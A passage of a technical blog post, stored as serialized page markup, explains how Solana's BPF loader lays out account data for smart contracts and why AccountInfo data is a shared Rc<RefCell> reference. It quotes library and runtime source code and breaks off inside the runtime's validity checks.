className":21803},[],[21805],{"type":33,"value":21150},{"type":33,"value":21807}," returns a mutable reference to the underlying buffer holding the data of the account. Normally in the course of contract execution, this comes from the serialized buffer passed into the contract by the BPF loader. So before we can understand the details here, let's take a quick detour...",{"type":27,"tag":58,"props":21809,"children":21811},{"id":21810},"bpf-loader-abi",[21812],{"type":33,"value":21813},"BPF Loader ABI",{"type":27,"tag":36,"props":21815,"children":21816},{},[21817,21819,21824,21826,21839],{"type":33,"value":21818},"Solana smart contracts have one job: interact with on-chain accounts. So what's the interface between the contract and the rest of the chain? To answer that, we're going to take a look at ",{"type":27,"tag":84,"props":21820,"children":21822},{"className":21821},[],[21823],{"type":33,"value":20930},{"type":33,"value":21825},"'s entrypoint code - the code that's added when you use the ",{"type":27,"tag":47,"props":21827,"children":21830},{"href":21828,"rel":21829},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#116-131",[51],[21831,21837],{"type":27,"tag":84,"props":21832,"children":21834},{"className":21833},[],[21835],{"type":33,"value":21836},"entrypoint!",{"type":33,"value":21838}," macro",{"type":33,"value":736},{"type":27,"tag":101,"props":21841,"children":21843},{"className":10270,"code":21842,"language":10269,"meta":7,"style":7},"#[no_mangle]\npub unsafe extern \"C\" fn entrypoint(input: *mut u8) -> u64 {\n let (program_id, accounts, instruction_data) =\n unsafe { $crate::entrypoint::deserialize(input) };\n match $process_instruction(&program_id, &accounts, &instruction_data) {\n Ok(()) => $crate::entrypoint::SUCCESS,\n Err(error) => error.into(),\n }\n}\n",[21844],{"type":27,"tag":84,"props":21845,"children":21846},{"__ignoreMap":7},[21847,21855,21927,21970,22022,22080,22122,22165,22172],{"type":27,"tag":207,"props":21848,"children":21849},{"class":209,"line":210},[21850],{"type":27,"tag":207,"props":21851,"children":21852},{"style":238},[21853],{"type":33,"value":21854},"#[no_mangle]\n",{"type":27,"tag":207,"props":21856,"children":21857},{"class":209,"line":244},[21858,21862,21867,21872,21877,21881,21886,21890,21894,21898,21902,21906,21911,21915,21919,21923],{"type":27,"tag":207,"props":21859,"children":21860},{"style":214},[21861],{"type":33,"value":20967},{"type":27,"tag":207,"props":21863,"children":21864},{"style":214},[21865],{"type":33,"value":21866}," unsafe",{"type":27,"tag":207,"props":21868,"children":21869},{"style":214},[21870],{"type":33,"value":21871}," extern",{"type":27,"tag":207,"props":21873,"children":21874},{"style":1325},[21875],{"type":33,"value":21876}," \"C\"",{"type":27,"tag":207,"props":21878,"children":21879},{"style":214},[21880],{"type":33,"value":20972},{"type":27,"tag":207,"props":21882,"children":21883},{"style":1335},[21884],{"type":33,"value":21885}," entrypoint",{"type":27,"tag":207,"props":21887,"children":21888},{"style":238},[21889],{"type":33,"value":1343},{"type":27,"tag":207,"props":21891,"children":21892},{"style":220},[21893],{"type":33,"value":15648},{"type":27,"tag":207,"props":21895,"children":21896},{"style":226},[21897],{"type":33,"value":736},{"type":27,"tag":207,"props":21899,"children":21900},{"style":226},[21901],{"type":33,"value":17093},{"type":27,"tag":207,"props":21903,"children":21904},{"style":214},[21905],{"type":33,"value":11009},{"type":27,"tag":207,"props":21907,"children":21908},{"style":8920},[21909],{"type":33,"value":21910}," u8",{"type":27,"tag":207,"props":21912,"children":21913},{"style":238},[21914],{"type":33,"value":2222},{"type":27,"tag":207,"props":21916,"children":21917},{"style":226},[21918],{"type":33,"value":8968},{"type":27,"tag":207,"props":21920,"children":21921},{"style":8920},[21922],{"type":33,"value":13142},{"type":27,"tag":207,"props":21924,"children":21925},{"style":238},[21926],{"type":33,"value":384},{"type":27,"tag":207,"props":21928,"children":21929},{"class":209,"line":270},[21930,21934,21938,21943,21947,21952,21956,21961,21965],{"type":27,"tag":207,"props":21931,"children":21932},{"style":214},[21933],{"type":33,"value":10290},{"type":27,"tag":207,"props":21935,"children":21936},{"style":238},[21937],{"type":33,"value":686},{"type":27,"tag":207,"props":21939,"children":21940},{"style":220},[21941],{"type":33,"value":21942},"program_id",{"type":27,"tag":207,"props":21944,"children":21945},{"style":238},[21946],{"type":33,"value":1123},{"type":27,"tag":207,"props":21948,"children":21949},{"style":220},[21950],{"type":33,"value":21951},"accounts",{"type":27,"tag":207,"props":21953,"children":21954},{"style":238},[21955],{"type":33,"value":1123},{"type":27,"tag":207,"props":21957,"children":21958},{"style":220},[21959],{"type":33,"value":21960},"instruction_data",{"type":27,"tag":207,"props":21962,"children":21963},{"style":238},[21964],{"type":33,"value":2222},{"type":27,"tag":207,"props":21966,"children":21967},{"style":226},[21968],{"type":33,"value":21969},"=\n",{"type":27,"tag":207,"props":21971,"children":21972},{"class":209,"line":296},[21973,21978,21982,21986,21991,21995,22000,22004,22009,22013,22017],{"type":27,"tag":207,"props":21974,"children":21975},{"style":214},[21976],{"type":33,"value":21977}," unsafe",{"type":27,"tag":207,"props":21979,"children":21980},{"style":238},[21981],{"type":33,"value":16862},{"type":27,"tag":207,"props":21983,"children":21984},{"style":226},[21985],{"type":33,"value":17565},{"type":27,"tag":207,"props":21987,"children":21988},{"style":214},[21989],{"type":33,"value":21990},"crate",{"type":27,"tag":207,"props":21992,"children":21993},{"style":226},[21994],{"type":33,"value":10768},{"type":27,"tag":207,"props":21996,"children":21997},{"style":238},[21998],{"type":33,"value":21999},"entrypoint",{"type":27,"tag":207,"props":22001,"children":22002},{"style":226},[22003],{"type":33,"value":10768},{"type":27,"tag":207,"props":22005,"children":22006},{"style":1335},[22007],{"type":33,"value":22008},"deserialize",{"type":27,"tag":207,"props":22010,"children":22011},{"style":238},[22012],{"type":33,"value":1343},{"type":27,"tag":207,"props":22014,"children":22015},{"style":220},[22016],{"type":33,"value":15648},{"type":27,"tag":207,"props":22018,"children":22019},{"style":238},[22020],{"type":33,"value":22021},") };\n",{"type":27,"tag":207,"props":22023,"children":22024},{"class":209,"line":445},[22025,22030,22035,22040,22044,22048,22052,22056,22060,22064,22068,22072,22076],{"type":27,"tag":207,"props":22026,"children":22027},{"style":376},[22028],{"type":33,"value":22029}," match",{"type":27,"tag":207,"props":22031,"children":22032},{"style":226},[22033],{"type":33,"value":22034}," $",{"type":27,"tag":207,"props":22036,"children":22037},{"style":220},[22038],{"type":33,"value":22039},"process_instruction",{"type":27,"tag":207,"props":22041,"children":22042},{"style":238},[22043],{"type":33,"value":1343},{"type":27,"tag":207,"props":22045,"children":22046},{"style":226},[22047],{"type":33,"value":10398},{"type":27,"tag":207,"props":22049,"children":22050},{"style":220},[22051],{"type":33,"value":21942},{"type":27,"tag":207,"props":22053,"children":22054},{"style":238},[22055],{"type":33,"value":1123},{"type":27,"tag":207,"props":22057,"children":22058},{"style":226},[22059],{"type":33,"value":10398},{"type":27,"tag":207,"props":22061,"children":22062},{"style":220},[22063],{"type":33,"value":21951},{"type":27,"tag":207,"props":22065,"children":22066},{"style":238},[22067],{"type":33,"value":1123},{"type":27,"tag":207,"props":22069,"children":22070},{"style":226},[22071],{"type":33,"value":10398},{"type":27,"tag":207,"props":22073,"children":22074},{"style":220},[22075],{"type":33,"value":21960},{"type":27,"tag":207,"props":22077,"children":22078},{"style":238},[22079],{"type":33,"value":1424},{"type":27,"tag":207,"props":22081,"children":22082},{"class":209,"line":867},[22083,22088,22093,22097,22101,22105,22109,22113,22117],{"type":27,"tag":207,"props":22084,"children":22085},{"style":8920},[22086],{"type":33,"value":22087}," Ok",{"type":27,"tag":207,"props":22089,"children":22090},{"style":238},[22091],{"type":33,"value":22092},"(()) ",{"type":27,"tag":207,"props":22094,"children":22095},{"style":226},[22096],{"type":33,"value":2321},{"type":27,"tag":207,"props":22098,"children":22099},{"style":226},[22100],{"type":33,"value":22034},{"type":27,"tag":207,"props":22102,"children":22103},{"style":214},[22104],{"type":33,"value":21990},{"type":27,"tag":207,"props":22106,"children":22107},{"style":226},[22108],{"type":33,"value":10768},{"type":27,"tag":207,"props":22110,"children":22111},{"style":238},[22112],{"type":33,"value":21999},{"type":27,"tag":207,"props":22114,"children":22115},{"style":226},[22116],{"type":33,"value":10768},{"type":27,"tag":207,"props":22118,"children":22119},{"style":238},[22120],{"type":33,"value":22121},"SUCCESS,\n",{"type":27,"tag":207,"props":22123,"children":22124},{"class":209,"line":892},[22125,22130,22134,22139,22143,22147,22152,22156,22161],{"type":27,"tag":207,"props":22126,"children":22127},{"style":8920},[22128],{"type":33,"value":22129}," Err",{"type":27,"tag":207,"props":22131,"children":22132},{"style":238},[22133],{"type":33,"value":1343},{"type":27,"tag":207,"props":22135,"children":22136},{"style":220},[22137],{"type":33,"value":22138},"error",{"type":27,"tag":207,"props":22140,"children":22141},{"style":238},[22142],{"type":33,"value":2222},{"type":27,"tag":207,"props":22144,"children":22145},{"style":226},[22146],{"type":33,"value":2321},{"type":27,"tag":207,"props":22148,"children":22149},{"style":220},[22150],{"type":33,"value":22151}," error",{"type":27,"tag":207,"props":22153,"children":22154},{"style":226},[22155],{"type":33,"value":1041},{"type":27,"tag":207,"props":22157,"children":22158},{"style":1335},[22159],{"type":33,"value":22160},"into",{"type":27,"tag":207,"props":22162,"children":22163},{"style":238},[22164],{"type":33,"value":10778},{"type":27,"tag":207,"props":22166,"children":22167},{"class":209,"line":1475},[22168],{"type":27,"tag":207,"props":22169,"children":22170},{"style":238},[22171],{"type":33,"value":10645},{"type":27,"tag":207,"props":22173,"children":22174},{"class":209,"line":2065},[22175],{"type":27,"tag":207,"props":22176,"children":22177},{"style":238},[22178],{"type":33,"value":451},{"type":27,"tag":36,"props":22180,"children":22181},{},[22182,22184,22189,22191,22197,22199,22206,22208,22214,22216,22223],{"type":33,"value":22183},"What we see here is the contract's real entrypoint - it takes a ",{"type":27,"tag":84,"props":22185,"children":22187},{"className":22186},[],[22188],{"type":33,"value":10709},{"type":33,"value":22190}," buffer in from the loader, and calls ",{"type":27,"tag":84,"props":22192,"children":22194},{"className":22193},[],[22195],{"type":33,"value":22196},"solana_program::entrypoint::deserialize",{"type":33,"value":22198},", which then ",{"type":27,"tag":47,"props":22200,"children":22203},{"href":22201,"rel":22202},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#281-337",[51],[22204],{"type":33,"value":22205},"parses out",{"type":33,"value":22207}," all the ",{"type":27,"tag":84,"props":22209,"children":22211},{"className":22210},[],[22212],{"type":33,"value":22213},"AccountInfo",{"type":33,"value":22215},"s, instruction data, and the current running program ID. We can see how the data buffer is ",{"type":27,"tag":47,"props":22217,"children":22220},{"href":22218,"rel":22219},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#308-316",[51],[22221],{"type":33,"value":22222},"laid out",{"type":33,"value":736},{"type":27,"tag":101,"props":22225,"children":22227},{"className":10270,"code":22226,"language":10269,"meta":7,"style":7},"#[allow(clippy::cast_ptr_alignment)]\nlet data_len = *(input.add(offset) as *const u64) as usize;\noffset += size_of::\u003Cu64>();\n\nlet data = Rc::new(RefCell::new({\n from_raw_parts_mut(input.add(offset), data_len)\n}));\noffset += data_len + MAX_PERMITTED_DATA_INCREASE;\noffset += (offset as *const u8).align_offset(BPF_ALIGN_OF_U128); // padding\n",[22228],{"type":27,"tag":84,"props":22229,"children":22230},{"__ignoreMap":7},[22231,22248,22328,22361,22368,22416,22461,22469,22493],{"type":27,"tag":207,"props":22232,"children":22233},{"class":209,"line":210},[22234,22239,22243],{"type":27,"tag":207,"props":22235,"children":22236},{"style":238},[22237],{"type":33,"value":22238},"#[allow(clippy",{"type":27,"tag":207,"props":22240,"children":22241},{"style":226},[22242],{"type":33,"value":10768},{"type":27,"tag":207,"props":22244,"children":22245},{"style":238},[22246],{"type":33,"value":22247},"cast_ptr_alignment)]\n",{"type":27,"tag":207,"props":22249,"children":22250},{"class":209,"line":244},[22251,22255,22260,22264,22268,22272,22276,22280,22284,22288,22292,22296,22300,22304,22308,22312,22316,22320,22324],{"type":27,"tag":207,"props":22252,"children":22253},{"style":214},[22254],{"type":33,"value":217},{"type":27,"tag":207,"props":22256,"children":22257},{"style":220},[22258],{"type":33,"value":22259}," data_len",{"type":27,"tag":207,"props":22261,"children":22262},{"style":226},[22263],{"type":33,"value":229},{"type":27,"tag":207,"props":22265,"children":22266},{"style":226},[22267],{"type":33,"value":17093},{"type":27,"tag":207,"props":22269,"children":22270},{"style":238},[22271],{"type":33,"value":1343},{"type":27,"tag":207,"props":22273,"children":22274},{"style":220},[22275],{"type":33,"value":15648},{"type":27,"tag":207,"props":22277,"children":22278},{"style":226},[22279],{"type":33,"value":1041},{"type":27,"tag":207,"props":22281,"children":22282},{"style":1335},[22283],{"type":33,"value":16914},{"type":27,"tag":207,"props":22285,"children":22286},{"style":238},[22287],{"type":33,"value":1343},{"type":27,"tag":207,"props":22289,"children":22290},{"style":220},[22291],{"type":33,"value":21177},{"type":27,"tag":207,"props":22293,"children":22294},{"style":238},[22295],{"type":33,"value":2222},{"type":27,"tag":207,"props":22297,"children":22298},{"style":214},[22299],{"type":33,"value":16122},{"type":27,"tag":207,"props":22301,"children":22302},{"style":226},[22303],{"type":33,"value":17093},{"type":27,"tag":207,"props":22305,"children":22306},{"style":214},[22307],{"type":33,"value":16931},{"type":27,"tag":207,"props":22309,"children":22310},{"style":8920},[22311],{"type":33,"value":13142},{"type":27,"tag":207,"props":22313,"children":22314},{"style":238},[22315],{"type":33,"value":2222},{"type":27,"tag":207,"props":22317,"children":22318},{"style":214},[22319],{"type":33,"value":16122},{"type":27,"tag":207,"props":22321,"children":22322},{"style":8920},[22323],{"type":33,"value":21008},{"type":27,"tag":207,"props":22325,"children":22326},{"style":238},[22327],{"type":33,"value":241},{"type":27,"tag":207,"props":22329,"children":22330},{"class":209,"line":270},[22331,22335,22340,22345,22349,22353,22357],{"type":27,"tag":207,"props":22332,"children":22333},{"style":220},[22334],{"type":33,"value":21177},{"type":27,"tag":207,"props":22336,"children":22337},{"style":226},[22338],{"type":33,"value":22339}," +=",{"type":27,"tag":207,"props":22341,"children":22342},{"style":1335},[22343],{"type":33,"value":22344}," size_of",{"type":27,"tag":207,"props":22346,"children":22347},{"style":226},[22348],{"type":33,"value":10768},{"type":27,"tag":207,"props":22350,"children":22351},{"style":238},[22352],{"type":33,"value":9257},{"type":27,"tag":207,"props":22354,"children":22355},{"style":8920},[22356],{"type":33,"value":15323},{"type":27,"tag":207,"props":22358,"children":22359},{"style":238},[22360],{"type":33,"value":15733},{"type":27,"tag":207,"props":22362,"children":22363},{"class":209,"line":296},[22364],{"type":27,"tag":207,"props":22365,"children":22366},{"emptyLinePlaceholder":19},[22367],{"type":33,"value":2062},{"type":27,"tag":207,"props":22369,"children":22370},{"class":209,"line":445},[22371,22375,22380,22384,22389,22393,22398,22403,22407,22411],{"type":27,"tag":207,"props":22372,"children":22373},{"style":214},[22374],{"type":33,"value":217},{"type":27,"tag":207,"props":22376,"children":22377},{"style":220},[22378],{"type":33,"value":22379}," data",{"type":27,"tag":207,"props":22381,"children":22382},{"style":226},[22383],{"type":33,"value":229},{"type":27,"tag":207,"props":22385,"children":22386},{"style":8920},[22387],{"type":33,"value":22388}," Rc",{"type":27,"tag":207,"props":22390,"children":22391},{"style":226},[22392],{"type":33,"value":10768},{"type":27,"tag":207,"props":22394,"children":22395},{"style":1335},[22396],{"type":33,"value":22397},"new",{"type":27,"tag":207,"props":22399,"children":22400},{"style":238},[22401],{"type":33,"value":22402},"(RefCell",{"type":27,"tag":207,"props":22404,"children":22405},{"style":226},[22406],{"type":33,"value":10768},{"type":27,"tag":207,"props":22408,"children":22409},{"style":1335},[22410],{"type":33,"value":22397},{"type":27,"tag":207,"props":22412,"children":22413},{"style":238},[22414],{"type":33,"value":22415},"({\n",{"type":27,"tag":207,"props":22417,"children":22418},{"class":209,"line":867},[22419,22424,22428,22432,22436,22440,22444,22448,22453,22457],{"type":27,"tag":207,"props":22420,"children":22421},{"style":1335},[22422],{"type":33,"value":22423}," from_raw_parts_mut",{"type":27,"tag":207,"props":22425,"children":22426},{"style":238},[22427],{"type":33,"value":1343},{"type":27,"tag":207,"props":22429,"children":22430},{"style":220},[22431],{"type":33,"value":15648},{"type":27,"tag":207,"props":22433,"children":22434},{"style":226},[22435],{"type":33,"value":1041},{"type":27,"tag":207,"props":22437,"children":22438},{"style":1335},[22439],{"type":33,"value":16914},{"type":27,"tag":207,"props":22441,"children":22442},{"style":238},[22443],{"type":33,"value":1343},{"type":27,"tag":207,"props":22445,"children":22446},{"style":220},[22447],{"type":33,"value":21177},{"type":27,"tag":207,"props":22449,"children":22450},{"style":238},[22451],{"type":33,"value":22452},"), ",{"type":27,"tag":207,"props":22454,"children":22455},{"style":220},[22456],{"type":33,"value":21082},{"type":27,"tag":207,"props":22458,"children":22459},{"style":238},[22460],{"type":33,"value":10449},{"type":27,"tag":207,"props":22462,"children":22463},{"class":209,"line":892},[22464],{"type":27,"tag":207,"props":22465,"children":22466},{"style":238},[22467],{"type":33,"value":22468},"}));\n",{"type":27,"tag":207,"props":22470,"children":22471},{"class":209,"line":1475},[22472,22476,22480,22484,22488],{"type":27,"tag":207,"props":22473,"children":22474},{"style":220},[22475],{"type":33,"value":21177},{"type":27,"tag":207,"props":22477,"children":22478},{"style":226},[22479],{"type":33,"value":22339},{"type":27,"tag":207,"props":22481,"children":22482},{"style":220},[22483],{"type":33,"value":22259},{"type":27,"tag":207,"props":22485,"children":22486},{"style":226},[22487],{"type":33,"value":1374},{"type":27,"tag":207,"props":22489,"children":22490},{"style":238},[22491],{"type":33,"value":22492}," MAX_PERMITTED_DATA_INCREASE;\n",{"type":27,"tag":207,"props":22494,"children":22495},{"class":209,"line":2065},[22496,22500,22504,22508,22512,22516,22520,22524,22528,22532,22536,22541,22546],{"type":27,"tag":207,"props":22497,"children":22498},{"style":220},[22499],{"type":33,"value":21177},{"type":27,"tag":207,"props":22501,"children":22502},{"style":226},[22503],{"type":33,"value":22339},{"type":27,"tag":207,"props":22505,"children":22506},{"style":238},[22507],{"type":33,"value":686},{"type":27,"tag":207,"props":22509,"children":22510},{"style":220},[22511],{"type":33,"value":21177},{"type":27,"tag":207,"props":22513,"children":22514},{"style":214},[22515],{"type":33,"value":16108},{"type":27,"tag":207,"props":22517,"children":22518},{"style":226},[22519],{"type":33,"value":17093},{"type":27,"tag":207,"props":22521,"children":22522},{"style":214},[22523],{"type":33,"value":16931},{"type":27,"tag":207,"props":22525,"children":22526},{"style":8920},[22527],{"type":33,"value":21910},{"type":27,"tag":207,"props":22529,"children":22530},{"style":238},[22531],{"type":33,"value":10416},{"type":27,"tag":207,"props":22533,"children":22534},{"style":226},[22535],{"type":33,"value":1041},{"type":27,"tag":207,"props":22537,"children":22538},{"style":1335},[22539],{"type":33,"value":22540},"align_offset",{"type":27,"tag":207,"props":22542,"children":22543},{"style":238},[22544],{"type":33,"value":22545},"(BPF_ALIGN_OF_U128); ",{"type":27,"tag":207,"props":22547,"children":22548},{"style":4647},[22549],{"type":33,"value":22550},"// padding\n",{"type":27,"tag":36,"props":22552,"children":22553},{},[22554,22556,22561,22563,22569,22571,22582,22584,22589,22591,22597,22599,22605,22607,22613],{"type":33,"value":22555},"In English, we have the length of the data, as a ",{"type":27,"tag":84,"props":22557,"children":22559},{"className":22558},[],[22560],{"type":33,"value":15323},{"type":33,"value":22562},", followed immediately by the data, and an additional ",{"type":27,"tag":84,"props":22564,"children":22566},{"className":22565},[],[22567],{"type":33,"value":22568},"MAX_PERMITTED_DATA_INCREASE",{"type":33,"value":22570}," of reserve space (+ padding) after that. Using the length and data pointer, we construct a Rust slice reference (",{"type":27,"tag":47,"props":22572,"children":22575},{"href":22573,"rel":22574},"https://doc.rust-lang.org/std/slice/fn.from_raw_parts_mut.html",[51],[22576],{"type":27,"tag":84,"props":22577,"children":22579},{"className":22578},[],[22580],{"type":33,"value":22581},"slice::from_raw_parts_mut",{"type":33,"value":22583},") - slices are how Rust represents a, well, ",{"type":27,"tag":942,"props":22585,"children":22586},{},[22587],{"type":33,"value":22588},"slice",{"type":33,"value":22590}," (contiguous chunk) of memory - then wrap it up inside a ",{"type":27,"tag":84,"props":22592,"children":22594},{"className":22593},[],[22595],{"type":33,"value":22596},"Rc\u003CRefCell\u003CT>>",{"type":33,"value":22598},", giving us the unwieldy-looking type of ",{"type":27,"tag":84,"props":22600,"children":22602},{"className":22601},[],[22603],{"type":33,"value":22604},"AccountInfo.data",{"type":33,"value":22606},": ",{"type":27,"tag":84,"props":22608,"children":22610},{"className":22609},[],[22611],{"type":33,"value":22612},"Rc\u003CRefCell\u003C&mut [u8]>>",{"type":33,"value":1041},{"type":27,"tag":36,"props":22615,"children":22616},{},[22617,22619,22626],{"type":33,"value":22618},"Now, what's the point of this complicated type? That's because when the same account is passed in multiple times to a program, instead of duplicating the data for the account, the BPF loader simply refers back to the first instance of the account. On the Rust side, that corresponds to ",{"type":27,"tag":47,"props":22620,"children":22623},{"href":22621,"rel":22622},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#335-336",[51],[22624],{"type":33,"value":22625},"cloning the referenced account",{"type":33,"value":736},{"type":27,"tag":101,"props":22628,"children":22630},{"className":10270,"code":22629,"language":10269,"meta":7,"style":7},"// Duplicate account, clone the original\naccounts.push(accounts[dup_info as usize].clone());\n",[22631],{"type":27,"tag":84,"props":22632,"children":22633},{"__ignoreMap":7},[22634,22642],{"type":27,"tag":207,"props":22635,"children":22636},{"class":209,"line":210},[22637],{"type":27,"tag":207,"props":22638,"children":22639},{"style":4647},[22640],{"type":33,"value":22641},"// Duplicate account, clone the original\n",{"type":27,"tag":207,"props":22643,"children":22644},{"class":209,"line":244},[22645,22649,22653,22657,22661,22665,22669,22674,22678,22682,22687,22691,22696],{"type":27,"tag":207,"props":22646,"children":22647},{"style":220},[22648],{"type":33,"value":21951},{"type":27,"tag":207,"props":22650,"children":22651},{"style":226},[22652],{"type":33,"value":1041},{"type":27,"tag":207,"props":22654,"children":22655},{"style":1335},[22656],{"type":33,"value":11096},{"type":27,"tag":207,"props":22658,"children":22659},{"style":238},[22660],{"type":33,"value":1343},{"type":27,"tag":207,"props":22662,"children":22663},{"style":220},[22664],{"type":33,"value":21951},{"type":27,"tag":207,"props":22666,"children":22667},{"style":238},[22668],{"type":33,"value":11019},{"type":27,"tag":207,"props":22670,"children":22671},{"style":220},[22672],{"type":33,"value":22673},"dup_info",{"type":27,"tag":207,"props":22675,"children":22676},{"style":214},[22677],{"type":33,"value":16108},{"type":27,"tag":207,"props":22679,"children":22680},{"style":8920},[22681],{"type":33,"value":21008},{"type":27,"tag":207,"props":22683,"children":22684},{"style":238},[22685],{"type":33,"value":22686},"]",{"type":27,"tag":207,"props":22688,"children":22689},{"style":226},[22690],{"type":33,"value":1041},{"type":27,"tag":207,"props":22692,"children":22693},{"style":1335},[22694],{"type":33,"value":22695},"clone",{"type":27,"tag":207,"props":22697,"children":22698},{"style":238},[22699],{"type":33,"value":22700},"());\n",{"type":27,"tag":36,"props":22702,"children":22703},{},[22704,22706,22711,22713,22718,22720,22725,22727,22732,22733,22739,22741,22746,22748,22760,22762,22767],{"type":33,"value":22705},"Since ",{"type":27,"tag":84,"props":22707,"children":22709},{"className":22708},[],[22710],{"type":33,"value":9468},{"type":33,"value":22712}," inside the ",{"type":27,"tag":84,"props":22714,"children":22716},{"className":22715},[],[22717],{"type":33,"value":22213},{"type":33,"value":22719}," is a ",{"type":27,"tag":84,"props":22721,"children":22723},{"className":22722},[],[22724],{"type":33,"value":22596},{"type":33,"value":22726},", where the ",{"type":27,"tag":84,"props":22728,"children":22730},{"className":22729},[],[22731],{"type":33,"value":13269},{"type":33,"value":22719},{"type":27,"tag":84,"props":22734,"children":22736},{"className":22735},[],[22737],{"type":33,"value":22738},"&mut [u8]",{"type":33,"value":22740}," pointing at the actual data buffer, when we clone the ",{"type":27,"tag":84,"props":22742,"children":22744},{"className":22743},[],[22745],{"type":33,"value":22213},{"type":33,"value":22747},", we get a new reference",{"type":27,"tag":22749,"props":22750,"children":22751},"sup",{},[22752],{"type":27,"tag":47,"props":22753,"children":22758},{"href":22754,"ariaDescribedBy":22755,"dataFootnoteRef":7,"id":22757},"#user-content-fn-rc-refs",[22756],"footnote-label","user-content-fnref-rc-refs",[22759],{"type":33,"value":1651},{"type":33,"value":22761}," to the slice pointing at the ",{"type":27,"tag":942,"props":22763,"children":22764},{},[22765],{"type":33,"value":22766},"same",{"type":33,"value":22768}," data buffer.",{"type":27,"tag":36,"props":22770,"children":22771},{},[22772,22774,22780,22782,22788],{"type":33,"value":22773},"And of course to uphold borrowing rules while having a shared pointer, we have interior mutability via ",{"type":27,"tag":84,"props":22775,"children":22777},{"className":22776},[],[22778],{"type":33,"value":22779},"RefCell",{"type":33,"value":22781}," to check the rules at runtime. (The ",{"type":27,"tag":84,"props":22783,"children":22785},{"className":22784},[],[22786],{"type":33,"value":22787},"lamports",{"type":33,"value":22789}," field is very similar, for essentially the same reason - we need to be able to mutate it, but it is also shared between multiple instances of the same account.)",{"type":27,"tag":36,"props":22791,"children":22792},{},[22793,22795,22801],{"type":33,"value":22794},"Changing the data of an account is done by simply writing to ",{"type":27,"tag":84,"props":22796,"children":22798},{"className":22797},[],[22799],{"type":33,"value":22800},"AccountInfo::data",{"type":33,"value":22802},", which, as we just saw, is basically a pointer into the serialized buffer from the runtime; after the program exits, the loader reads the buffer back in to look at what the new state of the accounts should be.",{"type":27,"tag":36,"props":22804,"children":22805},{},[22806,22808,22815],{"type":33,"value":22807},"This is also where the ",{"type":27,"tag":47,"props":22809,"children":22812},{"href":22810,"rel":22811},"https://github.com/solana-labs/solana/blob/9fb0e76dc276f88b79720112477383a120c61b8f/program-runtime/src/pre_account.rs",[51],[22813],{"type":33,"value":22814},"runtime validity checks",{"type":33,"value":22816}," are imposed.",{"type":27,"tag":101,"props":22818,"children":22820},{"className":10270,"code":22819,"language":10269,"meta":7,"style":7},"// Only the owner may change account data\n// and if the account is writable\n// and if the account is not executable\nif !(program_id == pre.owner()\n && is_writable // line coverage used to get branch coverage\n && !pre.executable())\n && pre.data() != post.data()\n{\n if pre.executable() {\n return Err(InstructionError::ExecutableDataModified);\n } else if is_writable {\n return Err(InstructionError::ExternalAccountDataModified);\n } else {\n return Err(InstructionError::ReadonlyDataModified);\n }\n}\n",[22821],{"type":27,"tag":84,"props":22822,"children":22823},{"__ignoreMap":7},[22824,22832,22840,22848,22889,22907,22936,22981,22988,23012,23047,23072,23104,23119,23151,23158],{"type":27,"tag":207,"props":22825,"children":22826},{"class":209,"line":210},[22827],{"type":27,"tag":207,"props":22828,"children":22829},{"style":4647},[22830],{"type":33,"value":22831},"// Only the owner may change account data\n",{"type":27,"tag":207,"props":22833,"children":22834},{"class":209,"line":244},[22835],{"type":27,"tag":207,"props":22836,"children":22837},{"style":4647},[22838],{"type":33,"value":22839},"// and if the account is writable\n",{"type":27,"tag":207,"props":22841,"children":22842},{"class":209,"line":270},[22843],{"type":27,"tag":207,"props":22844,"children":22845},{"style":4647},[22846],{"type":33,"value":22847},"// and if the account is not executable\n",{"type":27,"tag":207,"props":22849,"children":22850},{"class":209,"line":296},[22851,22855,22859,22863,22867,22871,22876,22880,22885],{"type":27,"tag":207,"props":22852,"children":22853},{"style":376},[22854],{"type":33,"value":9023},{"type":27,"tag":207,"props":22856,"children":22857},{"style":226},[22858],{"type":33,"value":20141},{"type":27,"tag":207,"props":22860,"children":22861},{"style":238},[22862],{"type":33,"value":1343},{"type":27,"tag":207,"props":22864,"children":22865},{"style":220},[22866],{"type":33,"value":21942},{"type":27,"tag":207,"props":22868,"children":22869},{"style":226},[22870],{"type":33,"value":10572},{"type":27,"tag":207,"props":22872,"children":22873},{"style":220},[22874],{"type":33,"value":22875}," pre",{"type":27,"tag":207,"props":22877,"children":22878},{"style":226},[22879],{"type":33,"value":1041},{"type":27,"tag":207,"props":22881,"children":22882},{"style":1335},[22883],{"type":33,"value":22884},"owner",{"type":27,"tag":207,"props":22886,"children":22887},{"style":238},[22888],{"type":33,"value":15018},{"type":27,"tag":207,"props":22890,"children":22891},{"class":209,"line":445},[22892,22897,22902],{"type":27,"tag":207,"props":22893,"children":22894},{"style":226},[22895],{"type":33,"value":22896}," &&",{"type":27,"tag":207,"props":22898,"children":22899},{"style":220},[22900],{"type":33,"value":22901}," is_writable",{"type":27,"tag":207,"props":22903,"children":22904},{"style":4647},[22905],{"type":33,"value":22906}," // line coverage used to get branch coverage\n",{"type":27,"tag":207,"props":22908,"children":22909},{"class":209,"line":867},[22910,22914,22918,22922,22926,22931],{"type":27,"tag":207,"props":22911,"children":22912},{"style":226},[22913],{"type":33,"value":22896},{"type":27,"tag":207,"props":22915,"children":22916},{"style":226},[22917],{"type":33,"value":20141},{"type":27,"tag":207,"props":22919,"children":22920},{"style":220},[22921],{"type":33,"value":101},{"type":27,"tag":207,"props":22923,"children":22924},{"style":226},[22925],{"type":33,"value":1041},{"type":27,"tag":207,"props":22927,"children":22928},{"style":1335},[22929],{"type":33,"value":22930},"executable",{"type":27,"tag":207,"props":22932,"children":22933},{"style":238},[22934],{"type":33,"value":22935},"())\n",{"type":27,"tag":207,"props":22937,"children":22938},{"class":209,"line":892},[22939,22943,22947,22951,22955,22959,22964,22969,22973,22977],{"type":27,"tag":207,"props":22940,"children":22941},{"style":226},[22942],{"type":33,"value":22896},{"type":27,"tag":207,"props":22944,"children":22945},{"style":220},[22946],{"type":33,"value":22875},{"type":27,"tag":207,"props":22948,"children":22949},{"style":226},[22950],{"type":33,"value":1041},{"type":27,"tag":207,"props":22952,"children":22953},{"style":1335},[22954],{"type":33,"value":9468},{"type":27,"tag":207,"props":22956,"children":22957},{"style":238},[22958],{"type":33,"value":21319},{"type":27,"tag":207,"props":22960,"children":22961},{"style":226},[22962],{"type":33,"value":22963},"!=",{"type":27,"tag":207,"props":22965,"children":22966},{"style":220},[22967],{"type":33,